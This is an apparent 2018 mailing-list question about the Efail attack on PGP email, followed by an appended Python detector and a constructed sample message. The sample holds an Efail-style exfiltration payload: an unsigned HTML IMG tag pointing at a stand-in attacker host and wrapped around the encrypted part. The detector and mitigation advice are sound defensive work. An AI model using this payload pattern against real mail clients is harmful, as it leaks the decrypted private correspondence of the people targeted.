Efail

eira wahlin panina at nonbinary.me
Wed May 16 09:04:19 CEST 2018


Hi.
I've been looking at a vulnerability in mail clients using PGP, described at efail.de. It is a technique where an attacker would inject an HTML IMG tag in an email, enveloping the encrypted text. This would send the cleartext message to the server indicated in the IMG tag.

To me, it seems that this attack would be defeated by signing the encrypted message, which (to my knowledge) most email clients do by default.

Am I missing something here? How do clients generally handle partially signed messages? Would they decrypt an encrypted message if it were enveloped in a cleartext IMG tag?

Panina, Malmö, Sweden
-- 
Sent from my Android device with K-9 Mail. Please excuse my brevity.
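A structural check for the message shape the question describes, added here as an example (it is not code from the original post or from GnuPG). The point it makes concrete: a signature inside the ciphertext only covers the inner content, so unsigned MIME parts placed around the encrypted part still verify as "signed" while being rendered together with the decrypted text. The sample message, the `attacker.invalid` host and the placeholder ciphertext are all constructed.

```python
import email
import re
from email import policy

# Constructed sample, not from the original post: unsigned text/html parts sit
# outside a PGP/MIME encrypted part, the shape the question describes.
MIXED_SAMPLE = b"""\
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="outer"

--outer
Content-Type: text/html

<img src="https://attacker.invalid/leak?
--outer
Content-Type: multipart/encrypted; protocol="application/pgp-encrypted"; boundary="inner"

--inner
Content-Type: application/octet-stream

-----BEGIN PGP MESSAGE-----
PLACEHOLDER-CIPHERTEXT
-----END PGP MESSAGE-----
--inner--
--outer
Content-Type: text/html

">
--outer--
"""


def audit_message(raw: bytes) -> dict:
    """Flag cleartext MIME parts surrounding PGP-encrypted content (unsigned by construction)."""
    report = {"encrypted_parts": 0, "cleartext_parts": [], "html_external_refs": 0}

    def visit(part):
        if part.get_content_type() == "multipart/encrypted":
            report["encrypted_parts"] += 1  # do not descend: its subparts are ciphertext
        elif part.is_multipart():
            for sub in part.iter_parts():
                visit(sub)
        else:
            ctype = part.get_content_type()
            report["cleartext_parts"].append(ctype)
            if ctype == "text/html" and re.search(r'src\s*=\s*["\']?https?://', part.get_content(), re.I):
                report["html_external_refs"] += 1

    visit(email.message_from_bytes(raw, policy=policy.default))
    report["risky"] = report["encrypted_parts"] > 0 and bool(report["cleartext_parts"])
    return report
```

A client-side mitigation that follows from the check is to decrypt and render the encrypted part in isolation, never as one HTML document together with its unsigned siblings, and to block remote image loads.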